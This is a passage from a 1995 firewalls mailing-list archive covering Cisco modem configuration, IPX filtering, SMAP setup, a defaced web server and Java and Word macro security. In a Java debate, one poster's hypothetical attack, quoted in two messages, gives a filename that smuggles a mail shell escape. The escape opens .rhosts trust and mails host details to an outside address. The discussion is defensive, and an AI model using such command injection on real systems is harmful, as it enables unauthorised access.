book "Information Security Policies made Easy". It's sold by Baseline Software, info@baselinesoft.com. A quite inspiring piece of work. (I'm not affiliated with Baseline or mr. Wood - I just think the book is worth while). Rgds, Niels -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- From firewalls-owner Sat Sep 16 13:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA02597 for firewalls-outgoing; Sat, 16 Sep 1995 12:35:40 -0700 Received: from mentos.hgs.se (Mentos.HGS.SE [130.238.202.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA02590 for ; Sat, 16 Sep 1995 12:35:33 -0700 Received: (from claes@localhost) by mentos.hgs.se (8.6.12/8.6.9) id VAA24181; Sat, 16 Sep 1995 21:31:43 +0200 Date: Sat, 16 Sep 1995 21:31:42 +0200 (MET DST) From: Claes Nygren X-Sender: claes@mentos To: mramirez@imparcial.com.mx cc: firewalls@GreatCircle.COM Subject: Re: Help with CISCO 2511 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote: > I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 F= AX) . > I=B4m having problems trying to configure the receiving modems to support > 14,400 bps from the callers. > Actually my users only can connect to the modems at 9600 bps, and the > technical support from CISCO told me that I have to change my modems to > 28,800 bps, that=B4s the only way that my receiving modems can receive ca= lls > at 14,400 bps. > It=B4s true?? , because I think that is some problem with the configurat= ion > of the CISCO (in dedicated or interactive mode) >=20 I think that if you don't set rxspeed and txspeed when configuring your lin= es on the cisco it will use 9600 as default value. I have put theese lines into our 516: line 2 14 login tacacs modem ri-is-cd rxspeed 38400 txspeed 38400 flowcontrol hardware Then I let the modems convert the linespeed. ------------------------------------------------------ Claes Nygren=09Hogskolan Gavle-Sandviken=09Tel +46 70 8200 803 claes@hgs.se=09S-801 76 GAVLE, SWEDEN=09=09Fax +46 26 648771 http://www.hgs.se/~claes =20 From firewalls-owner Sat Sep 16 13:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03375 for firewalls-outgoing; Sat, 16 Sep 1995 13:18:16 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA03362 for ; Sat, 16 Sep 1995 13:18:09 -0700 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id QAA06930; Sat, 16 Sep 1995 16:27:19 -0400 Received: from metis.milkyway.com (root@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id QAA00179 for ; Sat, 16 Sep 1995 16:14:46 -0400 Received: from metis.milkyway.com by metis.milkyway.com (8.6.9/BSDI-Client) id QAA19285; Sat, 16 Sep 1995 16:24:50 -0400 Message-Id: <199509162024.QAA19285@metis.milkyway.com> X-Mailer: exmh version 1.6.1 5/23/95 X-Face: +o^+u7Z5}dB^gVlCgr.W/thrVG>63+@L&~6W3um$qzdHEf*o^b4g'.>AF*9jO,@sw.~gu*+ !Ld4U(yvY'QL7ZSB#r3zb[pTsR0K5ZHDs5.8'w.'$u(o;imk*Z-.g)V|2a-KM-waTKUvx'xM>xOlZL E=ghh49p2h$1`Vp&rOtYlnm{|ixN#45yL)*j$3>QbmWu-[)Nw;^P53@cMO[P#Q>k3Ut)?Vh^`IJYvB ZdB[z`5aM4Z"wW@l~~iWw0MY^%F$mP)~F\lBcgj`h^hOvIp< X-Uri: http://www.milkyway.com/People/Michael_Richardson/Bio.html To: firewalls@greatcircle.com Subject: Re: IPX firewall? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii References: <9509121928.AA01068@rapid.rssi.com> Date: Sat, 16 Sep 1995 16:24:48 -0400 From: Michael Richardson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [I'm not a Novell expert, so please excuse any inprecision] In article <9509121928.AA01068@rapid.rssi.com>, Brad VanOrden wrote: >It should be noted that this firewall will be between two internal >Novell segments. If anyone knows of something that can help us, >it will be greatly appreciated. I'm still trying to figure out what an IPX firewall allows through it. I know what kind of services an IP firewall might pass through it. In generic terms: a) resource locations (DNS) b) email (SMTP) c) network management (SNMP) d) remote login (Telnet) e) file transfer (FTP,HTTP,Gopher) ... In the IPX world this might translate to: a) Service Advertising Protocol (SAP) b) BasicMHS appears to use network drives to exchange email. There appears to also be a protocol between client and server of some kind, but I didn't find any documentation on it. I presume that gateways between servers use something like X.400 or some such. c) rconsole? Novell also seems to support some SNMP management of hubs via add-on packages. SNMP is a multi-transport protocol anyway. d) This is not equal to "f:login" --- which is file sharing. rconsole is closer. e) the only analogue to HTTP/gopher that I came across in one Novell book I have is "ElectroText" (help). It uses file sharing. f) printing. Through a firewall? I still do not understand why... Mostly, from what I can tell, everything really comes down to getting access to the right set of file systems. In IP, we'd talk about doing NFS through the firewall. SAP filtering also sounds like it is something you want to do. And, based on the src/dest net/node/socket in the IPX packet that appears in the SAP info, you enable and disable rules. (You have to be dynamic I think). An SPX layer gateway would work for some facilities, e.g: printing which is SPX (connected) rather than connectionless IPX. I would dearly like to educated on *what* kinds of things an IPX firewall has to provide to be useful to a customer. From firewalls-owner Sat Sep 16 13:32:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03069 for firewalls-outgoing; Sat, 16 Sep 1995 13:04:00 -0700 Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA03062 for ; Sat, 16 Sep 1995 13:03:55 -0700 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA26513; Sat, 16 Sep 1995 13:02:36 -0700 Received: from scndprsn.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA14434; Sat, 16 Sep 1995 02:20:16 -0700 Received: from pepper.Eng.Sun.COM by scndprsn.Eng.Sun.COM (5.x/SMI-SVR4) id AA18123; Sat, 16 Sep 1995 02:20:14 -0700 Received: by pepper.Eng.Sun.COM (5.x/SMI-SVR4) id AA21010; Sat, 16 Sep 1995 02:21:11 -0700 Date: Sat, 16 Sep 1995 02:21:11 -0700 From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis) Message-Id: <9509160921.AA21010@pepper.Eng.Sun.COM> To: cwe@Csli.Stanford.EDU Subject: Re: I wish Java would go away ... Cc: firewalls@GreatCircle.COM, kjj@pondscum.phx.mcd.mot.com.cmcmanis@Sun.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the great mail. > But aren't you assuming people will follow the rules you've set up for > this game? You say things like "in Java", and "impossible". I try not to make this assumption. I try to assume that web browsing is a "given." That is that the user community has chosen to take on the risk of exposing themselves to net scams in the form of web pages. > * It is not impossible given stupid users that disable your > restrictive defaults, setting READPATH==WRITEPATH==everywhere? > You leave a heavy burden on the security officer, since Java is > so extensibly configurable. This might be the thing that tips the > balance, so to say. It is our goal to clearly and precisely enumerate the "knobs" available and as they relate to security. Since we understand the effect of the knobs on applet capabilities we can explain exactly what risks the user entails by setting them. We also provide a mechanism so that the security officer can disable the adustment of any knobs, however that mechanism can be defeated by a power user who rebuilds the system from source. Any suggestions on how to prevent users from running applications on their nodes that they have constructed would be interesting. > * you say "within JAVA", assuming somehow that _only Java will be > used_ for a virus? there are plenty of other bits and pieces out > there that together with Java might make up a virus. The problem of > virii has changed somewhat, as is shown by the Word 6 virus. You > are reasoning about virii on *one* level, the byte code level. But > what about higher-level virii? No, I say "within Java" because that is the change to the system. Presuming that you have some understanding of how secure your system is "before Java" then I can help you understand the impact of "after Java." No one in the Java group should claim that Java has any _immunization_ effect, only that it doesn't increase susceptiblity. The bits and pieces that are there now are still there, waiting to be exploited. My favorite virus so far is the "don't read you mail because it can infect your system" virus which is entirely semantic based. > * The messiness of it all. Java opens up a lot of unexpected > information and modification pathways. These new changes might > change the security analysis of *another* program in a significant > way, that *together* might become a major security problem. No, it doesn't. > 1/ java applet downloaded, does something neat, and also at the same > time deposits a file in the allowed file space, containing > malicious data. Lets say that it's filename is > > 'look \n > ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org' > > (that was the filename.) Cute but it doesn't fly. Since Applets cannot replace FileOutputStream (the only way to create a file on the host system) and FileOutputStream will in fact reject this "name" out of hand, but even if it didn't it would put up a dialog box that said, "This applet is trying to open '... ...' should this be allowed? Yes or No?" and the user will say "Gee that is a stupid filename, no way!" > it also makes the file setuid/setgid or something like that. > Something that will make most logging systems notice. Java doesn't even come close to offering the ability to change protection bits. > 2/ during the night the security audit starts, and walks through > the file tree with something like this; > > find /home -perm 4000 -print | mail staff@$50.com > > This will generate perfectly legitimate input to the mail > program. > > illegal file(s) found! > Files: > look > ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org > > mail understands the ~! to be a shell escape, that is executed. > The intruder will have a couple of hours before the admin reads > this mail. Again, doing strict vulnerability analysis on this attack requires that a) the applet can create a file with your bogus name, and b) the permissions can be diddled. Neither of which are possible and there is no mechanism for getting around this. > I would argue there are uncountable numbers of similar attacks. And > yes, you can probably introduce some kind of virus through this > scheme, if you want to. And I assert that it is fundamentally impossible to "damage" the users system in a meaningful way if all an applet can do is render pixels and play sounds. (Actually I take that back, consider the person who has in their office a PC with a voice input system and our malicious user comes in, asks you to show how you can delete files by voice, and how you can open some other file by voice, which is covertly recorded and then digitized and spliced into a command to delete a critical control file and when you visit their page an applet is loaded that blurts out of the speaker "Computer! Delete config.sys. Reboot!" in your voice.) So now that you know it is _impossible_ to write a file from an applet without its name popping up in a dialog box (that the applet cannot prevent) And it is impossible to diddle with the permission bits, tell me how you can create a virus ? > Your concentration on virii is because you believe this is/was the > main threat with Java. I don't think that is the main threat. I > instead believe that Java might "complete some chains of small > deficiencies", and it is general enough to do this in non-obvious > ways. Actually Virii are simply popular with the press, they are not a threat with Java. The _real_ threats are preventing applets from getting information from inside the firewall and exporting it outside (or even to a confederate inside). Here the defenses get much more interesting, especially if you start from the position that the attacker already has control over your name server inside your firewall. > And you reason about Java as a stand-alone thing. It is not, it is > part of a complex ecology of tools, scripts, configurations and > practices. Why do you assume an attacker will "play by the rules"? On the contrary, I assume the attacker won't play by the rules, but by the same token if I send mail to all of the users inside a firewall and say "We're rebuilding the password database, please send us your user name and password so that you will be able to log into your system after you reboot." A non-zero percentage will send me their passwords! I can increase the odds by forging the mail from an operator alias. I want to make sure that Java won't make it any easier to make this attack than it is now. But I can't prevent it, simply not participate. I don't assume Java is standalone but I do assume that most people will be simply browsing with it. I know how to crack systems and I recognize that it is nearly impossible to think of something beyond one's own experience so I encourage input like yours and others on the list. > I believe Java, and the Java team of course, is doing an excellent > job. And immediately does the next security monster rear it's ugly > head. Not fair! :-) Thanks for the kudos (and your virii thoughts!) for those of you doing audits you may wish to start by grepping for the word 'native' in the Java source hierarchy, this will give you a list of all files that transistion out of Javas security domain. Take a look at what the methods do and how they are implemented. This will give you a rough cut at the risk vectors. --Chuck McManis Java guy From firewalls-owner Sat Sep 16 14:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05121 for firewalls-outgoing; Sat, 16 Sep 1995 14:05:23 -0700 Received: from noc.tor.hookup.net (noc.tor.hookup.net [165.154.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05107 for ; Sat, 16 Sep 1995 14:05:18 -0700 Received: from taylor.tor.hookup.net (taylor.tor.hookup.net [165.154.8.92]) by noc.tor.hookup.net (8.7.Beta.14/1.483) with SMTP id RAA09247 for ; Sat, 16 Sep 1995 17:04:04 -0400 (EDT) Date: Sat, 16 Sep 1995 17:04:04 -0400 (EDT) Message-Id: <199509162104.RAA09247@noc.tor.hookup.net> X-Sender: taylor@noc.tor.hookup.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: btaylor@integain.com (Bob Taylor) Subject: IP Filtering under AIX Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings All, I need to find an IP packet filter for AIX, capable of filtering based on protocol and port at least. The ability to filter based on source and destination address as well would be great. I have looked at ipfilter and screend, either of which would appear to do much of what I need, but neither of which is designed to compile under AIX - at least that I could find. Ideally, the filter would be applied differently to the two interfaces of my host, or only applied to one interface. This is for an internal firewall rather than an internet firewall, so I don't really need all of the bells and whistles - just packet filtering. Any suggestions would be greatly appreciated. Regards, Bob. -------------------------------------------------------------------- Bob Taylor - Consultant - InteGain Corporation Email: btaylor@integain.com Voice: (416) 410-2628 -------------------------------------------------------------------- From firewalls-owner Sat Sep 16 16:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA07495 for firewalls-outgoing; Sat, 16 Sep 1995 15:37:08 -0700 Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA07488 for ; Sat, 16 Sep 1995 15:37:04 -0700 Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/3.1.090690-Ovid Technologies) id AA03066; Sat, 16 Sep 1995 16:33:07 -0600 Date: Sat, 16 Sep 1995 16:33:07 -0600 (MDT) From: Adam Prato To: mramirez@imparcial.com.mx, firewalls@greatcircle.com Subject: Re: Help with CISCO 2511 In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 15 Sep 1995, Adam Prato wrote: >=20 >=20 > On Tue, 12 Sep 1995 mramirez@imparcial.com.mx wrote: >=20 > > I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400= FAX) . > > I=B4m having problems trying to configure the receiving modems to suppo= rt > > 14,400 bps from the callers. > > Actually my users only can connect to the modems at 9600 bps, and the > > technical support from CISCO told me that I have to change my modems to > > 28,800 bps, that=B4s the only way that my receiving modems can receive = calls > > at 14,400 bps. > > It=B4s true?? , because I think that is some problem with the configur= ation > > of the CISCO (in dedicated or interactive mode) > >=20 > > Thanks.. >=20 > I dont think so. But try this > 1) Make sure all dipswitch settings are correct for the modems > 2) logon to routers console (not telnet) and enable privileged mode > 3) config term > 4) line 1 10 > 5) modem in out > 6) ctrl-c (exit config-line) > 7) telnet to the router at port 20xx - where the XX refers to the line of= the > modem, from 01 to 10. > 8) issue the necessary AT commands to communicate with the modem. Configu= re > the modem to autoanswer (ATS0=3D1) and any other modem settings (&c1&d= 3 so > on soforth) > 9) exit by pressing escape sequence. default on cisco is ctrl-shft-6-x = =20 > 10) clear line XX where XX is the line you just configured >=20 > thats it. logoff the router (ignore any errors about open connections) an= d > dial in. >=20 > Adam >=20 I neglected to say: 11) config term, line 1 10, modem ri-is-cd to set the modems back. Adam From firewalls-owner Sat Sep 16 19:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA10076 for firewalls-outgoing; Sat, 16 Sep 1995 18:54:31 -0700 Received: from koromiko.off.connect.com.au (koromiko.off.connect.com.au [192.94.41.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA10069 for ; Sat, 16 Sep 1995 18:54:25 -0700 Received: (from csb@localhost) by koromiko.off.connect.com.au id LAA02463 (8.6.12/IDA-1.6); Sun, 17 Sep 1995 11:52:52 +1000 From: Craig Bishop Message-ID: <199509170152.LAA02463@koromiko.off.connect.com.au> Subject: Re: I wish Java would go away ... To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis) Date: Sun, 17 Sep 1995 11:52:51 +1000 (EST) Cc: cwe@Csli.Stanford.EDU, firewalls@GreatCircle.COM, kjj%pondscum.phx.mcd.mot.com.cmcmanis@Sun.COM In-Reply-To: <9509160921.AA21010@pepper.Eng.Sun.COM> from "Chuck McManis" at Sep 16, 95 02:21:11 am X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1318 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chuck McManis writes: > > > 1/ java applet downloaded, does something neat, and also at the same > > time deposits a file in the allowed file space, containing > > malicious data. Lets say that it's filename is > > > > 'look \n > > ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon@remail.org' > > > > (that was the filename.) > > Cute but it doesn't fly. Since Applets cannot replace FileOutputStream > (the only way to create a file on the host system) and FileOutputStream > will in fact reject this "name" out of hand, but even if it didn't > it would put up a dialog box that said, "This applet is trying to open > '... ...' should this be allowed? Yes or No?" and the > user will say "Gee that is a stupid filename, no way!" This is exactly the sort of problem which exists with java and the hotjava browser. We the administrators want to set the policy for how java and hotjava work and do not want the user to be able to override that policy. There is going to be one or more users who are more stupid than the filename. Allow a global configuration file which the user cannot circumvent and we are part way to solving many of the problems. Cheers, Craig -- Craig Bishop - Internet Security Analyst csb@connect.com.au http://www.connect.com.au/people/csb/ From firewalls-owner Sat Sep 16 22:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12088 for firewalls-outgoing; Sat, 16 Sep 1995 21:32:26 -0700 Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA12077 for ; Sat, 16 Sep 1995 21:32:23 -0700 Received: by netcom10.netcom.com (8.6.12/Netcom) id VAA14885; Sat, 16 Sep 1995 21:28:10 -0700 Date: Sat, 16 Sep 1995 21:28:10 -0700 (PDT) From: Michael Nelson X-Sender: mikenel@netcom10 To: firewalls@greatcircle.com Subject: What am I doing wrong with SMAP? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi... I am trying to install SMAP from FWTK v1.3 in BSD/OS 2.0. However, I've run into a little snag. Everytime I connect to port 25 (by hand), SMAP complains that it cannot chroot (into the syslog). /etc/inetd.conf is set to fire up SMAP as a root-owned process -- like the example config files show. The error: Sep 17 00:20:40 dreamland smap[2088]: fwtksyserr: cannot chroot to /var/spool/smap: Operation not permitted I am stumped... -- Mike -- Michael Nelson (mikenel@netcom.com) | Through the firewall, off the router, Rockville, Maryland | over the ATM backbone, nothing but BSD/OS, WinNT, OLE2 Development | 'net. From firewalls-owner Sat Sep 16 22:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA12956 for firewalls-outgoing; Sat, 16 Sep 1995 22:10:13 -0700 Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA12949 for ; Sat, 16 Sep 1995 22:10:10 -0700 Received: by netcom10.netcom.com (8.6.12/Netcom) id VAA18237; Sat, 16 Sep 1995 21:56:32 -0700 Date: Sat, 16 Sep 1995 21:56:31 -0700 (PDT) From: Michael Nelson X-Sender: mikenel@netcom10 To: firewalls@greatcircle.com Subject: Figured out why SMAP wouldn't work on BSDI... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Naturally I figure out why SMAP wouldn't chroot on BSDI after I post my message here :-). If SMAP is compiled with the shared libraries, attempting to chroot results in an "Operation not permitted" error. I have gotten into the habit of modifying Makefiles to make programs compile with the shared libaries. This usually results in a dramatically smaller binary (hard disk space is a valuable resource here ). It broke things in this case... While putting the shared library in the "chroot'd" area might have worked, I have decided to keep it as simple as possible (hopefully simple==safer). -- Mike -- Michael Nelson (mikenel@netcom.com) | Through the firewall, off the router, Rockville, Maryland | over the ATM backbone, nothing but BSD/OS, WinNT, OLE2 Development | 'net. From firewalls-owner Sun Sep 17 16:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA26591 for firewalls-outgoing; Sun, 17 Sep 1995 15:54:28 -0700 Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA26584 for ; Sun, 17 Sep 1995 15:54:24 -0700 Message-ID: Date: 17 Sep 1995 18:53:16 U From: "Gateway Server" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #531 Sent: Fri, Sep 15, 1995 6:52 PM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sun, Sep 17, 1995 6:53 PM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Sun Sep 17 19:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA00475 for firewalls-outgoing; Sun, 17 Sep 1995 18:50:07 -0700 Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA00468 for ; Sun, 17 Sep 1995 18:50:04 -0700 Received: from histar2.ezunx.com by scruz.net (8.6.9/1.34) id SAA05070; Sun, 17 Sep 1995 18:47:37 -0700 Date: Sun, 17 Sep 95 12:16:10 PDT From: Rich Subject: Comments on a hacked server/page To: webserver-nt@DELTA.PROCESS.COM, firewalls@greatcircle.com X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thought I would throw this out for a bit of discussion... Recently, a friend of mine who runs a IAP/ISP company (about 600 customers so far) was 'compromised' on an NT server for his home page. (I did NOT set up his security/firewall, otherwise this would not have happened :-) ) At anyrate, the jist of it was his home page was "altered" through a whole in the cern server which ran on the outside. What was altered?? The prices for access to his services!!!!! This might have gone on "undetected" for quite some time, however, he had to make a change to the page due to an AREA code change (sometimes the phone company can provide a real use) and he pulled the old one up to edit. He then noticed that the prices had been increased by $20-30 per month for dialup access and by almost $50 for isdn and I won't even mention the leased line prices, but they were HIGH! What are the odds that the author checks all his/her pages often enough to catch something like this, and this brings to light a question.... How can you protect yourself from "altered" information? I mean what if someone had changed his page to load pornographic images or slanderous comments? Who is responsible? A tough call I know. I am now checking my home pages at least weekly! (ALL OF THEM!) cheers.... Rich Fitzgerald p.s. the hole in the cern server is now plugged... (we hope) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ** Remember -- Life is NOT a dress rehearsal! (nor is it a small furry animal with funny feet and floppy ears...) From firewalls-owner Sun Sep 17 19:32:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA01619 for firewalls-outgoing; Sun, 17 Sep 1995 19:30:46 -0700 Received: from wraith.internode.com.au (wraith.internode.com.au [192.83.231.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA01608 for ; Sun, 17 Sep 1995 19:30:41 -0700 Received: by wraith.internode.com.au (5.83--+1.3.1+0.50/UA-5.23) id AA05723; Mon, 18 Sep 1995 11:54:45 +0930 From: Simon Hackett Message-Id: <9509180224.AA05723@wraith.internode.com.au> Subject: Re: Comments on a hacked server/page To: raf@ezunx.com (Rich) Date: Mon, 18 Sep 95 11:54:44 CST Cc: webserver-nt@DELTA.PROCESS.COM, firewalls@greatcircle.com, ross@rocksoft.com In-Reply-To: ; from "Rich" at Sep 17, 95 12:16:10 pm X-Mailer: ELM [version 2.4dev PL17] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rich says: > This might have gone on "undetected" for quite some time, however, he had to > make a change to the page due to an AREA code change (sometimes the phone > company can provide a real use) and he pulled the old one up to edit. He then > noticed that the prices had been increased by $20-30 per month for dialup access > and by almost $50 for isdn and I won't even mention the leased line prices, but > they were HIGH! > > What are the odds that the author checks all his/her pages often enough to catch > something like this, and this brings to light a question.... > > How can you protect yourself from "altered" information? I mean what if someone > had changed his page to load pornographic images or slanderous comments? Who is > responsible? A tough call I know. > > I am now checking my home pages at least weekly! (ALL OF THEM!) A company called Rocksoft makes a cryptographically secure data integrity checking product called Veracity which is ideal for this situation - you can run it on a regular (e.g. cron-driven) basis and it'll pinpoint exactly what's changed. The "snapshot" file it creates and uses for subsequent checks is also internally cryptographically secure so it cannot itself be modified without detection. Drop them a line (info@rocksoft.com) for more details. They'll also email you info on getting a free 30 day demo copy via the internet in response to email to demo@rocksoft.com. Cheers, Simon Hackett (a satisfied customer) ------------------------------------------------------------------------ "Simon Hackett, Internode Systems Pty Ltd" Phone: +61 8 373 1020 Fax: +61 8 373 4911 Mail: PO Box 69, Daw Park, SA 5041 AUSTRALIA From firewalls-owner Mon Sep 18 02:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA08529 for firewalls-outgoing; Mon, 18 Sep 1995 01:47:59 -0700 Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA08522 for ; Mon, 18 Sep 1995 01:47:56 -0700 Message-ID: Date: 18 Sep 1995 04:44:56 U From: "Gateway Server" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #533 Sent: Sat, Sep 16, 1995 4:41 AM To: Harris Tom On Server: PRC Bellevue NE MS Date: Mon, Sep 18, 1995 4:44 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Mon Sep 18 02:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09311 for firewalls-outgoing; Mon, 18 Sep 1995 02:19:39 -0700 Received: from sophos.demon.co.uk (meriadoc.sophos.com [193.82.145.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA09294 for ; Mon, 18 Sep 1995 02:19:28 -0700 Received: from elbereth.sophos.com (elbereth.sophos.com [193.82.145.10]) by sophos.demon.co.uk (8.6.11/8.6.9) with ESMTP id KAA16296; Mon, 18 Sep 1995 10:22:03 +0100 Received: (from matthew@localhost) by elbereth.sophos.com (8.6.11/8.6.9) id KAA20930; Mon, 18 Sep 1995 10:19:50 +0100 Date: Mon, 18 Sep 1995 10:19:50 +0100 From: Matthew J Brown Message-Id: <199509180919.KAA20930@elbereth.sophos.com> To: firewalls@greatcircle.com, mjb@sophos.com, ian@virusbtn.com, jh@sophos.com, benl@mojo.europe.dg.com Subject: Horrible thought wrt. the Word virus Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Driving home last night, I had a sudden thought of the potential dangers inherent in Microsoft Word, which go far beyond the simple virus the entire world got so worked up about. Word Basic is not the simple macro language many of us (including myself until very recently) have believed. In fact, I am informed by people I know who have developed in it, a Word Basic program can access ANY function in ANY Windows DLL. This includes just about any Windows system function, and, worryingly, WINSOCK.DLL. Therefore, all you need to break just about anyone's firewall and internet security is to con somebody into reading a word document of yours. The possibilities are pretty limitless, but one possibility would be to get word to drop a windows executable which acts as a remote-control for that windows system, connecting out through the firewall to a remote site where Mr Bad Guy sits. Or something that looks for local UNIX systems, breaks in through the syslog hole using sendmail, and drops a worm program in them? Use your imagination. Word documents should henceforth be treated *EXACTLY* the same as executables; they're nearly as powerful, and their operating environment is damn common. it's also worrying to think about how many other applications have data files which are practically executables, and capable of calling system functions when loaded. A friend mentioned PowerBuilder, for example; I'm sure there are a *flood* of others. -Matt, hoping he's being over paranoid, but I don't think so. From firewalls-owner Mon Sep 18 05:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13305 for firewalls-outgoing; Mon, 18 Sep 1995 05:25:17 -0700 Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA13298 for ; Mon, 18 Sep 1995 05:25:13 -0700 Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id VAA27390; Mon, 18 Sep 1995 21:21:45 +0900 Date: Mon, 18 Sep 1995 21:21:45 +0900 From: Chiaki Ishikawa Message-Id: <199509181221.VAA27390@gate.personal-media.co.jp> To: Firewalls@GreatCircle.COM In-reply-to: <199509151603.JAA08002@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM) Subject: Re: WWW - http - cgi_scripts Reply-to: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 3987 >Also, consider running your httpd chroot()d so that the CGI >scripts have to run in this virtual "jail" as well. I learned from a Japanese BBS that a provider's machine that serves as subscribers' home pages went down because one of the scripts spawned (or forked) itself over and over and again. Like the original poster, I am also in the position of managing company www pages, and wonder what I should do regarding CGI scripts. Right now, from what I have learned, I am very skeptical of letting anyone putting in CGI scripts. IF and WHEN I and some other competent programmers have time to look over what the various divisions's home page teams hand in, we will put short and provable CGI scripts. Otherwise, I won't. I 